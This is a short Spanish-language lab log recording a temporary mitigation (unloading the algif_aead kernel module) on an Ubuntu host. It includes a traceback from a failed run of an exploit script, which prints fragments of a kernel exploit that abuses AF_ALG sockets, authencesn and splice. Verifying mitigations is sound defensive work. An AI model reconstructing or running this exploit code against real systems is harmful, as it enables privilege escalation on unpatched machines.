=== HITO 3: MITIGACIÓN TEMPORAL ===
Fecha: vie 15 may 2026 00:23:40 -05
Hostname: ubuntu
algif_aead en lsmod:
(módulo NO cargado - mitigación activa)

Intento de exploit post-mitigación:
Traceback (most recent call last):
  File "/home/etrujillo/Desktop/copy_fail_exp.py", line 9, in <module>
    while i<len(e):c(f,i,e[i:i+4]);i+=4
  File "/home/etrujillo/Desktop/copy_fail_exp.py", line 5, in c
    a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
FileNotFoundError: [Errno 2] No such file or directory